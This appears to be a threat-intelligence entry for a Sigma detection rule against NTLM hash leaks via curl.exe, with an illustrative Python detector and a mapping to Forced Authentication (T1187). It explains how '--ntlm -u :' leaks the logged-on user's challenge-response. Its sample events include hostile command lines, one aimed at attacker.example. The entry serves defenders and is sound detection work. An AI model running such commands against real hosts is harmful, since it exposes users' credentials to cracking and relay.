NTLM Hash Leak Via Curl NTLM Authentication (916eb839-895e-47f8-99ee-3008bf377a3e)
Detects the use of curl with NTLM authentication and empty credentials (`--ntlm -u :`), which can be abused to leak the currently logged-in user's NTLMv2 challenge-response to an attacker-controlled server, enabling offline cracking or relay attacks. When the user name and password are both empty, curl passes a NULL identity to Windows SSPI, which falls back to the credentials of the current logon session held by LSASS, so no plaintext password is required. This behavior is specific to SSPI-enabled builds of curl, such as the binary Microsoft ships with Windows 10 and Windows Server 2019; curl's own `-u` documentation describes `-u :` as the way to select the environment's credentials for NTLM, Negotiate, Kerberos and Digest on such builds. Note that `-u :` without `--ntlm` (or `--negotiate`) sends nothing of value, so the detection keys on both conditions being present on the same command line.
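The detection condition described above, implemented as an added example over a few constructed process-creation events; this is illustrative code, not the Sigma rule's own selection list and not code from the curl project. It assumes events arrive as dictionaries with `Image` and `CommandLine` fields (as Sysmon Event ID 1 or Windows 4688 would provide), the function names `tokenize_cmdline`, `has_empty_credentials`, `is_curl_ntlm_leak` and `scan` are hypothetical, and the credential forms it checks (`-u :`, `--user :`, and the joined short form `-u:`) are my reading of curl's option syntax rather than the rule's exact string list.

```python
import ntpath

# Constructed sample events (not real telemetry). Only events 1 and 2 should match:
# 3 supplies real credentials, 4 lacks --ntlm, 5 is the parent shell rather than
# curl.exe itself (the spawned curl.exe child would produce its own event).
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe --ntlm -u : http://10.0.0.5/share"},
    {"id": 2, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -s --ntlm --user ":" http://attacker.example/'},
    {"id": 3, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -u alice:Passw0rd --ntlm http://intranet/"},
    {"id": 4, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -u : http://intranet/"},
    {"id": 5, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "curl.exe --ntlm -u : http://10.0.0.5/"'},
]


def tokenize_cmdline(cmdline: str) -> list[str]:
    """Split a Windows command line into arguments.

    Handles double quotes only (no backslash escapes); a simplification of the
    CRT rules that is adequate for curl invocations. Quoted ':' becomes ':'.
    """
    args, cur, in_quotes, have_tok = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
            have_tok = True  # "" is an empty argument, not nothing
        elif ch.isspace() and not in_quotes:
            if have_tok:
                args.append("".join(cur))
                cur, have_tok = [], False
        else:
            cur.append(ch)
            have_tok = True
    if have_tok:
        args.append("".join(cur))
    return args


def has_empty_credentials(args: list[str]) -> bool:
    """True when the credential argument is a lone ':' (empty user and password).

    Forms checked (assumed from curl's option syntax): '-u :', '--user :', '-u:'.
    """
    for i, a in enumerate(args):
        if a in ("-u", "--user"):
            if i + 1 < len(args) and args[i + 1] == ":":
                return True
        elif a.startswith("-u") and a[2:] == ":":
            return True
    return False


def is_curl_ntlm_leak(event: dict) -> bool:
    """Match curl.exe launched with --ntlm and empty credentials."""
    if ntpath.basename(event.get("Image", "")).lower() != "curl.exe":
        return False
    args = tokenize_cmdline(event.get("CommandLine", ""))
    # curl option names are case-sensitive, so an exact match is correct here.
    if "--ntlm" not in args:
        return False
    return has_empty_credentials(args)


def scan(events: list[dict]) -> list[int]:
    """Return the ids of events that match the detection."""
    return [e["id"] for e in events if is_curl_ntlm_leak(e)]


if __name__ == "__main__":
    for eid in scan(SAMPLE_EVENTS):
        print(f"event {eid}: curl NTLM with empty credentials (possible hash leak)")
```

Tokenizing the command line rather than substring-matching avoids both the quoted-colon evasion (`-u ":"`) and the false positive where `:` merely appears inside a URL after `-u`.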
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| NTLM Hash Leak Via Curl NTLM Authentication (916eb839-895e-47f8-99ee-3008bf377a3e) | Sigma-Rules | Forced Authentication - T1187 (b77cf5f3-6060-475d-bd60-40ccbf28fdc2) | Attack Pattern | 1 |